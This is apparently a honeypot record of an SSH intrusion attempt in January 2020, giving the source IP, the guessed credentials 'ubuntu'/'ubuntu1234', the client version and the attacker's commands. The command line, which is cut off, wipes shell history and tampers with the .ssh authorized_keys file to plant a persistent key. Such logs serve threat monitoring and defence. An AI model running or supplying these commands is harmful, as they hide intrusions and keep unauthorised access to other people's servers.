Attack d879c58a-281e-40a7-9de6-1e5a2c4b9676
Details
| ID | d879c58a-281e-40a7-9de6-1e5a2c4b9676 |
| Attack Type | ssh |
| IP Address | 182.61.164.51 |
| Username | ubuntu |
| Password | ubuntu1234 |
| Client Version | SSH-2.0-libssh2_1.8.0 |
| Country | China |
| Date | 2020-01-14 10:08PM |
Commands
uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;cat .ssh/authorized_keys|grep -v 'heVAZUWSKHausOwb+Rem+eKhkrKvoeteq
Proxy Requests
| IP Address | User / Pass | Date | Headers | URL |
|---|